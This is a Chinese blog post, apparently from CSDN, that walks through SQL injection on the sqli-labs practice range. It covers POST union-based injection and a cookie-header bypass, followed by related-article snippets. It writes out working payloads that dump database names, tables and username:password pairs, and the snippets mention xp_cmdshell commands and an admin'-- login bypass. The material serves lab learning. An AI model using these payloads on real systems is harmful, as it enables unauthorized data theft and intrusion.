SQL注入-靶场案例练习

于 2024-07-30 00:19:47 发布
阅读量413 收藏 3
点赞数 8
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73902453/article/details/140781883
版权

1.这边先以sqli-less11为例,进行一个简单的post注入的过程。因为在实战中我们并不能看到源码,所以这题我们就按照正常情况来进行注入。因为POST型数据提交的方式是在URL中无法看到数据的,所以我们要用burpsuit进行抓包,然后通过抓包得来的数据再进行修改参数。

我们在刚开始的时候先随便输个账号密码,然后通过burpsuit进行抓包。

通过BP抓取的数据可知该请求为POST请求,并且传递的数据就在抓包页的最后一行,接着我们随便判断一下语句闭合的方式,有可能是',",)也有可能是;,我们通过修改uname=admin后面加入可能的闭合的符号发现只有',页面会显示语法报错,我们就可以猜出此页面的闭合方式是'(单引号).

接下来知道了语句闭合的方法,就尝试直接利用盲注来查找字段数,直接用联合查询,select 1,select 1,2.....一个个进行尝试,发现在输入select 1,2的时候页面显示了1和2,再输入1,2,3的时候页面就报错了,此刻我们就知道了该页面的字段数为2。

我们传参行改为下列语句,在用户名里一般是不会有-号开头的,一般是字符串,所以在admin前的-就是让uname是找不到这个参数的,以便于不会覆盖掉后面联合查询的1和2,而最后的--+属于注释符,将后面的语句闭合掉。

uname=-admin' union select 1,2 --+&passwd=123123&submit=Submit

到这一步后,后面的语句修改都和之前讲解的例子都一样了,接下来一次输入下列指令。

uname=-admin' union select 1,database() --+&passwd=123123&submit=Submit
//查询数据库名

uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' --+&passwd=123123&submit=Submit
//查询数据表

uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&passwd=123123&submit=Submit
//查询数据列

uname=-admin' union select 1,group_concat(username,0x3a,password) from users --+&passwd=123123&submit=Submit
//查询数据

2.要是网站有一些阻碍该怎么办,假如有我们之前讲过的魔术符号,就是在‘后面会加/的应该怎么办,这里以less-20为例,采取cookie头提交的方式进行绕过。

我们在刚开始的时候试了很多闭合符号,发现页面都正常显示,这说明页面源代码处可能含有过滤的功能,那我们先抓包。

抓包后,将最后一行提交数据行删除,然后多加一行cookie。

Cookie:uname =-admin' union select 1,2,database() --+&passwd=123123&submit=Submit

发现利用cookie可以绕过防护,得到数据库名,那接下来的操作和上面就相同。

yr1019
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入详解
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL-Labs靶场“36-37”关通关教程
钟言的博客
03-19 3412
本篇为SQL-Labs靶场的36关到37关的通关教程,详细内容包含了:一、36关 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37关POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-Labs靶场“34-35”关通关教程
钟言的博客
03-18 2535
本篇为SQL-Labs靶场的34到35关教程,详细内容包含了:34关 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35关 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
SQL注入攻击实例-CMS
weixin_62715196的博客
01-10 1867
记录一次对CMS靶场的注入过程,详细讲述如何注入的流程
SQL-Labs靶场“1-5”关通关教程
钟言的博客
02-16 1万+
本篇详细记录了SQL-Labs靶场的第一关到第五关的通关教程,详细内容包括:、准备工作 、第一关 基于GET单引号字符型注入 1、源码分析 2、联合查询注入过程 3、报错注入过程 、第二关 基于GET整型注入 1、源码分析 2、联合查询注入过程 四、第三关 基于GET单引号变形注入 1、源码分析 2、联合查询注入过程五、第四关 基于GET双引号字符型注入 1、源码分析 2、联合查询注入过程 六、第五关 基于GET单引号报错注入 1、源码分析 2、floor报错注入3、updatexml报错注入等等
BP靶场SQL注入练习
剁椒鱼头没剁椒的博客
01-14 1727
Bp靶场有点类似于常见的DVWA靶场、piachu靶场,里面富含多种不同类型的漏洞,并且每个靶场都有针对性,例如sql注入,从最简单的判断开始,逐步的增加难度,并且每一个靶场都附带介绍以及通过方式,能够让新人快速的了解原理并且针对性练习
SQL-Labs靶场“32-33”关通关教程
钟言的博客
03-14 5675
本篇为SQL-Labs靶场的第32关到33关的通关教程(宽字节注入),详细内容包含了、32关 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33关 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
SQL-Labs靶场“54-57”关通关教程
钟言的博客
03-25 3222
本篇为SQL-Labs靶场“54-57”关通关教程,详细内容包含了54关 基于GET的cookie10单引号注入 1、源码分析 2、联合查询注入 55关 基于GET的cookie14括号注入 1、源码分析 2、联合查询注入 56关 基于GET的cookie14变形注入 1、源码分析 2、联合查询注入 四、57关 基于GET的cookie14双引号注入 1、源码分析 2、联合查询注入等内容
SQL-Labs靶场“6-10”关通关教程
热门推荐
钟言的博客
02-17 1万+
本篇为SQL-Labs靶场的6-10关通关教程,详细内容包含了第六关 基于GET的双引号报错注入 1、源码分析 2、floor报错注入 3、updatexml报错注入 第七关 基于文件写入注入 1、源码分析 2、outfile注入过程 三、第八关 基于GET单引号布尔盲注 1、源码分析 2、布尔盲注 (脚本) 2、布尔盲注(手工) 3、布尔盲注 (sqlmap) 四、第九关 基于GET单引号基于时间盲注 1、源码分析 2、时间盲注 (手工) 3、时间盲注 (脚本) 4、时间盲注 (sglmap五、第十关等等
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sql-lap注入靶场
05-02
这个"sql-lap注入靶场"是专门为学习和实践SQL注入漏洞而设计的一个平台。在这个靶场中,你可以模拟黑客攻击,体验如何利用SQL注入来破解系统,同时也能够提升你的安全防护意识和技能。 SQL注入攻击的基本原理是,...
sqli-sql注入著名靶场
03-28
在本文中,我们将深入探讨SQL注入攻击、如何防范以及“sqli-sql注入著名靶场”这个资源在学习和提升安全防护能力方面的作用。 首先,SQL注入攻击的原理是利用不安全的SQL查询语句,通过输入恶意数据来控制数据库...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: ...
sql注入靶场.zip
06-24
靶场的核心是sqli-labs,这是一个开源的SQL注入练习平台,特别适合初学者和专业人士用来增强对SQL注入的理解。它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠...
【力扣】SQL题库练习5
最新发布
qq_40878316的博客
07-25 1013
即按字母在字典中出现顺序对字符串排序,字典序较小则意味着排序靠前。返回结果格式如下例所示。
会Excel就会sql
svygh123的专栏
07-20 1264
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
WEB渗透Web突破篇-SQL注入(MSSQL
qq_59468567的博客
07-25 483
EXEC xp_cmdshell "net user"; EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; 激活xp_cmdshell(sql server 2015中默认禁用状态) EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; REC
CTF Web SQL注入 10000字详解
qq_27489877的博客
07-25 1276
SQL注入就是在数据交互中,前端数据传到后台时没有做严格的判断,导致传进来的数据被拼接到sql语句中,被当作sql语句的一部分进行执行,从而导致数据泄露,丢失甚至服务器瘫痪。对其中的特殊字符进行了转义,但在存入数据库时还是原来的数据,数据中一般带有单引号和#号,然后下次使用在拼凑SQL中,所以就形成了二次注入。当原语句的闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,导致报错,通过报错信息我们就可以推断出闭合符。攻击者必须闭合开放的字符串(使用引号),然后注入额外的 SQL 代码。
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名和密码,点击登录按钮。 2. 在浏览器中按F12打开开发者工具,切换到Network选项卡。 3. 再次点击登录按钮,查看POST请求的数据包。 4. 将POST请求的数据包复制到Burp Suite等代理工具中。 5. 在代理工具中修改用户名为:admin'--,密码随意填写。 6. 发送修改后的数据包,即可成功登录管理员账户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值